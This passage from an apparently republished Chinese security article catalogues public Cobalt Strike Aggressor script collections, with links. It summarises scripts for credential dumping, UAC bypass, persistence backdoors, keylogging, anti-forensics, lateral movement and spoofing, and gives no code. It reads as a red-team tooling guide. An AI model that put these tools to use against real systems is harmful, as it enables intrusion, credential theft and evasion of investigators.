src="https://wechat2rss.xlab.app/img-proxy/?k=9813f466&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1Z5eLYpTytrhA8ib8IiaGtVQQEe4JgyblN82EEAtwYiadD2bNJt6FudPWw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址： <a href="https://github.com/vysec/Aggressor-VYSEC" target="_blank">https://github.com/vysec/Aggressor-VYSEC</a><br/><strong>auto-prepenv.cna</strong> 机器上线时自动把explorer.exe设置为ppid，测试时不知道是不是权限原因没有生效。<br/><strong>Blacklist.cna</strong> 可以实现设置一个上线机器的黑名单列表，如果机器再次上线会自动退出会话。感觉如果遇到溯源或者蜜罐以及一些虚拟分析环境等这个脚本会比较有用。<br/><strong>mimikatz_addons.cna</strong> 则是新注册了一个password_change命令，可以实现直接使用mimikatz的密码更改功能强制修改NTLM哈希。<br/><strong>ping.cna</strong> 注册一个ping命令，并使用IP地址为HEX的形式去执行该命令。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.35978835978835977" data-s="300,640" style="" data-type="png" data-w="378" src="https://wechat2rss.xlab.app/img-proxy/?k=ceee4af5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUKKB7xJS4NaJFQd2sQSZIL8zWN3BmNQVECI7VbVaXtibJShRroRJoDfQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>portfwd.cna </strong>   会注册一个portfwd命令，可以实现端口转发。<br/><strong>pushover-ng.cna</strong> 当中的pushover则是一个和slack很相似的东西，配置好相关的api和key之后都可以实现动态推送到手机。<br/><strong>test.cna </strong>只是一个简单的test脚本。<br/><strong>vnc-psh.cna</strong> 是一个把Invoke-Vnc.ps1 注入到内存当中开启VNC服务的脚本，默认端口为5900，密码为SuperMan123。<br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>8、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">接下来介绍一个针对domain admin和local admin的辅助发现脚本。<br/></span></p><p><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.2745945945945946" data-s="300,640" style="" data-type="png" data-w="3700" src="https://wechat2rss.xlab.app/img-proxy/?k=56fd262b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1UzL9nQFCiaN4Y5lX9Iytg1fZzoY6dVmHGpQIybLvHByyKX3wQ9HKhMA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：<a href="https://github.com/killswitch-GUI/CobaltStrike-ToolKit" target="_blank">https://github.com/killswitch-GUI/CobaltStrike-ToolKit</a><br/><strong>Initial-DACheck.cna</strong> 会在机器上线时对域用户组进行枚举，同时也可以使用命令行中新增的checkda命令进行主动检测。<br/><strong>Initial-LAdminCheck.cna</strong> 如果检测到上线机器当前用户为普通管理员会自动 bypassuac 然后 logonPassword 抓密码。命令行中对应的独立命令是checkla。<br/><strong>DA-Watch.cna</strong> 是另一个小伙伴们开发的，相对于上面的脚本好处在于可以避免使用powershell，同样可以实现对DA一定程度的监控，命令有：uaddDA、uremDA、ulistDA、uhookOn、uhookOff、Credential Checks。不过这个脚本比较特殊，并没有把这些命令注册到beacon命令行里，需要在script console中执行。命令含义基本如字面意思，github有更详细的介绍这里不再多说。<br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>9、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">这里讲一个持久化脚本，脚本优秀之处在于不需要依赖外部脚本完全依靠自身命令完成。<br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/ZonkSec/persistence-aggressor-script" target="_blank">https://github.com/ZonkSec/persistence-aggressor-script</a><br/><strong>persistence.cna</strong>    简单来说就是通过注册表, 写服务, WMI, linkinfo, 粘滞键5种方式通过9种手法实现持久控制，在命令行中新注册了一个persistence命令，具体命令如下所示。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6510638297872341" data-s="300,640" style="" data-type="png" data-w="705" src="https://wechat2rss.xlab.app/img-proxy/?k=df942362&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUO2UGrDW4GylqMEdhKVpGSK3mvcD5RPibhBpM4xhEzAPZjWic8AxSaAmw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>10、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">一个让人很舒服的辅助性脚本小套装。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.4832869080779944" data-s="300,640" style="" data-type="png" data-w="2872" src="https://wechat2rss.xlab.app/img-proxy/?k=03472e43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1uV0ibNXn5CIU4O3AW6x1F6iaB05iaUushA6oicM2P6sjavQj1neSibHYK9w%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/ramen0x3f/AggressorScripts" target="_blank">https://github.com/ramen0x3f/AggressorScripts</a><br/><strong>bueller.cna</strong> 简单来说可以实现这么一个需求：你想知道哪些机器是能通某个特定网的时候，可以使用该插件做到。结果会输出在script console当中。需要注意的一点是，因为是所有beacon，所以获得最终结果的时间和给beacon设置的sleep时间是紧密相关的。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3532818532818533" data-s="300,640" style="" data-type="png" data-w="518" src="https://wechat2rss.xlab.app/img-proxy/?k=324b0939&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUNnF0aewk2OlRyvia3u7TDQJFb5NgFXmGZfZKNVMxoLmuEiapnJFHiceqg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>cdolla.cna</strong> 会检测当前上线机器当中哪些是localadmin权限，并且会列出过去90天内登陆过的用户。扫描之前需要先给待扫描的机器添加“cdolla”备注，扫描单个目标直接在cdolla命令后面接目标ip。<br/>compromised_log.rpt     是cs导出报告时的一个模板，模板具体说明见github，至于导入方式可以在 Cobalt Strike &gt; Preferences &gt; Reporting &gt; Select template 导入。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.932475884244373" data-s="300,640" style="" data-type="png" data-w="622" src="https://wechat2rss.xlab.app/img-proxy/?k=2649b664&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUYQq3NLhFtdcWSCzibwqaQRuQmUfGB0xmnjemIDkL9XMsgd0oHGns6MQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>credpocalypse.cna</strong> 的用意是通过在设定的时间内定时dump密码来防止错过新登录的用户，添加和移除登陆监视列表的操作都在图形化界面当中。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.1257861635220126" data-s="300,640" style="" data-type="png" data-w="318" src="https://wechat2rss.xlab.app/img-proxy/?k=dbc77c93&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUjwh082IYhKOt0loOe7AoDgxeg9ias77dy5e3HLMRIZibgyYicjd0ev9gQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>leave_no_trace.cna</strong> 会记录用户上传过得文件，测试是不管文件上传成功或者失败都会记录。用意是攻击流程完成之后便于痕迹清理和样本回收。展示位于view栏下，右键弹出的两个选项是尝试删除和检查是否清理完毕。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.19692532942898974" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=e7544086&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUbmOAia2icTJNdyoibZ3CfdsmCpTXNoojY6DUvhK5pSDRZUogIzF1OiaagA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>portscan_results.cna</strong> 会在view下新加一栏&#34;Port Scan Results&#34;，用来展示portscan的结果，并且支持排序。<br/><strong>save_log.cna</strong> 用来记录和导出单个beacon的命令和输出信息，对应的命令是start_log和stop_log，文件会导出在 cobaltstrike / saved_logs / [beacon id] _yyyyMMdd_HHmmssSSS.log<br/><strong>utils.cna </strong>是一组小功能的集合，包括打印环境变量、获得指定进程的第一个pid、返回登陆的用户数等等。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>11、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面介绍一组短小精悍的脚本，几个脚本做到兼具权限提升和持久控制。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3269461077844311" data-s="300,640" style="" data-type="png" data-w="3340" src="https://wechat2rss.xlab.app/img-proxy/?k=cdcc3bbb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1ic6YsLjVRTicjKpibicia1vzqUf5QPOJ3u91Gmq9GHDibqloEoP9Fyc7TbVA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/rasta-mouse/Aggressor-Script" target="_blank">https://github.com/rasta-mouse/Aggressor-Script</a> <br/>既可以针对功能单个导入，也可以通过直接载入<strong>loader.cna</strong>一次性载入两个脚本， <strong>elevate.cna</strong> 会增加五种提权方式，<strong>persistence.cna </strong>提供两种持久控制的方式。<br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7783251231527094" data-s="300,640" style="" data-type="png" data-w="406" src="https://wechat2rss.xlab.app/img-proxy/?k=3997f246&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU1O6pKWNxjTfbQaIASMmOPTe88sGwfQvoYvdohARGS2TM4GDrZWGTtA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5956112852664577" data-s="300,640" style="" data-type="png" data-w="319" src="https://wechat2rss.xlab.app/img-proxy/?k=621462eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUzF7wOWYl6Ug9RLPiaWPconFI0RefYzLXPaObNw9Othyibtz7eDia9UhCg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>dcom.cna </strong>的作用是使用DCOM运行PowerShell在远程主机上生成会话。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.17151607963246554" data-s="300,640" style="" data-type="png" data-w="653" src="https://wechat2rss.xlab.app/img-proxy/?k=9c7db9de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUsXibg5LiaCCOmpH5b1lyVTQviaapKgyibDy0Im9xRCePABeFJJjjxW4IyA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>12、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">介绍一个专注uac bypass的脚本，uacbypass.cna 会增加三种bypass uac的方式。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/RhinoSecurityLabs/Aggressor-Scripts" target="_blank">https://github.com/RhinoSecurityLabs/Aggressor-Scripts</a><br/>增加三种bypass uac 的说法是写于十月份的文章简版，当时的3.8版本elevate菜单当中只有两种提权方式，包括ms14-058和uac-dll。如今cs已经出到3.12，elevate菜单当中已经自带了这个脚本当中的一种提权方式——uac-token-duplication，所以说使用3.12版本载入脚本后的效果是只增加了两种新的提权方式。另外脚本会注册一条audit_uac 命令，该命令的作用是通过检查uac设置和主机版本来确认哪些无文件的uac bypass 手法是有效的。<br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.12408088235294118" data-s="300,640" style="" data-type="png" data-w="1088" src="https://wechat2rss.xlab.app/img-proxy/?k=4cb884bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUwq83LaXISzPDu1Q0mDbc6xJFPotwv4ic5b0ibHg7EtfMyv9eMoiasic4UQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6495098039215687" data-s="300,640" style="" data-type="png" data-w="408" src="https://wechat2rss.xlab.app/img-proxy/?k=024c981c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUCxvHtCEtAicHHxdicgh7j7er99mbbU6vl8fbR4JeE3Sic9yu6rmDp3gmA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>13、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面介绍一个有点调皮的脚本小套装，几个整蛊功能和国外的几款远控比较相似。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.52265625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=fafebae9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1kicP0h2sRnTKomTgYUcGtBjKRCO7qZDwiban1zQiaWX7KIDgcia4yvxXiaw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/Und3rf10w/Aggressor-scripts" target="_blank">https://github.com/Und3rf10w/Aggressor-scripts</a><br/><strong>KitLoader.cna</strong> 可以一键导入上面除键盘记录外的8个脚本，auto-keylogger.cna 可以实现在机器上线时自动进行键盘记录。<br/>AnnoyKit.cna 的功能主要是整蛊型的，包括隐藏IE的进程，播放整蛊歌曲等方式。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6770601336302895" data-s="300,640" style="" data-type="png" data-w="449" src="https://wechat2rss.xlab.app/img-proxy/?k=28d1fd27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUa1gAuZ2fEgN8qCox2Jic2S6pE0Q01TXeOrcsBJalj3b8I9ZWaBw5OHg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>AntiForensicsKit.cna</strong> 主要功能是反取证，包括检查虚拟机环境、清除日志、对付CarbonBlack等等。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5284697508896797" data-s="300,640" style="" data-type="png" data-w="562" src="https://wechat2rss.xlab.app/img-proxy/?k=43b3a1d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUNeQDq0hbIIukfhjBWGV5SBU0bMtv3Okvvl4azD8vS4gKibMOj9aShvg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>CredKit.cna</strong> 是一个凭证窃取的小集合，包括Firefox、寻找keepass的配置文件、获取keepass数据库的key、运行Invoke-mimikittenz。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8212290502793296" data-s="300,640" style="" data-type="png" data-w="358" src="https://wechat2rss.xlab.app/img-proxy/?k=0fedb19f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUZ8jiaw64vfXClpQ9QYn3YOzOYz2OUqPLicZ08qMUckd2sVExJC1CLTAQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>EnumKit.cna</strong> 包含的功能很多，包括获取主机WLAN密码、更新时间、用户权限情况、ip、安装应用等，也有定位carbon black的CB server和联动bloodhound的功能。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.9124236252545825" data-s="300,640" style="" data-type="png" data-w="491" src="https://wechat2rss.xlab.app/img-proxy/?k=8ff26fcb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUjscCrkAK2Lb0xIhCusbsabd4lGvdO443kQicymDjFMP9DicnDplstibiaA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>PersistKit.cna</strong> 是持久控制模块，可以创建后门服务，NTFS ADS后门和无文件后门。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7587064676616916" data-s="300,640" style="" data-type="png" data-w="402" src="https://wechat2rss.xlab.app/img-proxy/?k=bf2f9cf3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUvug8r7JxoOyVBYSuv49YCsAV9Y0ukZ8icN088bzP7m5iadh7eN2JBTxw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>PrivescKit.cna</strong> 主要是借助power up 把提权模块遍历扫描一遍。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.26526315789473687" data-s="300,640" style="" data-type="png" data-w="475" src="https://wechat2rss.xlab.app/img-proxy/?k=c10ff193&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU6HJ4Xk8jTWicm06WiawjhiavhHqoibSTwF6EpjMHXpxia77cLZOiaPmyGQDg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>thirdparty.cna</strong> 在命令行中注册了一条com-exec 命令，可以实现通过DCOM在目标上机器上弹shell。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.25193798449612403" data-s="300,640" style="" data-type="png" data-w="516" src="https://wechat2rss.xlab.app/img-proxy/?k=b8f78082&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNURQ556ZnyQBuNqAFC1pTTEJsqeWYLYOvuDCqvqQ3icS0lfwBNPftbHfA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>auto-keylogger.cna</strong> 插件载入后会在机器上线之后自动进行键盘记录工作。<br/>剩下四个是kit套装之外的插件，当中的knightlab-timeline.rpt 是一个cs报告的模板。<br/><strong>inveigh.cna</strong> 会在机器上运行指定时间的Inveigh，自动启用LLMNR和NBNS欺骗，Inveigh.ps1 需要自己去下载。<br/><a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank">https://github.com/Kevin-Robertson/Inveigh</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6622073578595318" data-s="300,640" style="" data-type="png" data-w="299" src="https://wechat2rss.xlab.app/img-proxy/?k=b984ca2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUpybDP9nXwTpmpGOq3VZjC5fT2VkUlnNaz2FbM1sTKTEG1u8XMzoxTg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>pushover.cna</strong> 在配置好之后也可以通过 pushover.net 实现信息推送功能。<br/><strong>ebowla-interop.cna</strong> 可以借助ebwola创建加密的payload，不过需要自己提前下好ebwola.py 放到目录下。<br/><a href="https://github.com/Genetic-Malware/Ebowla" target="_blank">https://github.com/Genetic-Malware/Ebowla</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.052547770700637" data-s="300,640" style="" data-type="png" data-w="628" src="https://wechat2rss.xlab.app/img-proxy/?k=e2690305&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUlVb3FZlibDzb4sEyxQ1pC1IHf9nMd0UicQJHuUncVR0ibMSITSSibY5ZCQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>14、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">再来一个来自001SPARTaN的小合集，老哥头像是个很亲切的蓝屏。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.4197247706422018" data-s="300,640" style="" data-type="png" data-w="3488" src="https://wechat2rss.xlab.app/img-proxy/?k=8532c879&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1ogleogtkym8vxQ5rrO64aIVmN5RjXLRqRdCVTHwlKu7CQ0Oz77cD2w%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/001SPARTaN/aggressor_scripts" target="_blank">https://github.com/001SPARTaN/aggressor_scripts</a><br/><strong>elevate.cna</strong> 是基于原作者的修改版本，增加了七种elevate的方式。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.795774647887324" data-s="300,640" style="" data-type="png" data-w="426" src="https://wechat2rss.xlab.app/img-proxy/?k=82ca77e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUfX119BibfoibdLK5WKR3pfia0ibGMFibIibND29jqeUE34Ccs0Ugto5SxhSg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>个人认为<strong>logvis.cna</strong> 是一个相当人性化的插件，载入之后view command_log 可以实现管理员对机器操作命令的可视化。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.43911917098445596" data-s="300,640" style="" data-type="png" data-w="772" src="https://wechat2rss.xlab.app/img-proxy/?k=97472727&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU6jzRiapbxK0vqJtDjtwQVWbYmZDWAuVAo2eWVoiaGbFIV9t1fiagcgTuA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>vis.cna </strong> 会新建一个视图，实时显示web动态和上线机器ID及user等信息。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.32242990654205606" data-s="300,640" style="" data-type="png" data-w="1070" src="https://wechat2rss.xlab.app/img-proxy/?k=963d3d19&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUEye8cb2e468wnYXf9e0IMloUDtf5DCSbYOkTQHkkNtFiaCfibajX6WLA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>bot.cna</strong> 是一个多功能机器人，功能包括提权、下载、标记、命令执行等等，命令格式是“!+命令”，载入插件后在event log 里输入“!help”可以获得机器人的所有操作命令。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3475336322869955" data-s="300,640" style="" data-type="png" data-w="892" src="https://wechat2rss.xlab.app/img-proxy/?k=e5f075bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUkcVpm6SGDx3rm3WkkiaC8zk1dJEicVKyK3oazEra0DXfhYkmbn2gtcwg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> <br/><strong>custom_defaults.cna </strong>会一键载入 elevate.cna 和powershell.cna ,另外会增加几个快捷键。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.2563600782778865" data-s="300,640" style="" data-type="png" data-w="511" src="https://wechat2rss.xlab.app/img-proxy/?k=9aaa2aa1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUU6sFnCWsAXUAhMZvia0Ficx93sa9TcuZLj2sib9KkEJlianO4RNsPEIT4w%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>dcom_lateral_movement.cna</strong> 注册了一个“dcom_shellexecute”命令，使用dcom执行命令横向移动，该插件是对enigma0x3研究的cna实现。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3293172690763052" data-s="300,640" style="" data-type="png" data-w="498" src="https://wechat2rss.xlab.app/img-proxy/?k=c39fe09e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUddabYgxibqiagYl4FgkiaD6vGQEDW0U1P86fpCkBBfiaYB2biapeHOt9llQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>download_screenshots.cna</strong> 会抓取所有机器的截图并下载下来，按钮添加在cobalt strike标签里。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.3742331288343559" data-s="300,640" style="" data-type="png" data-w="163" 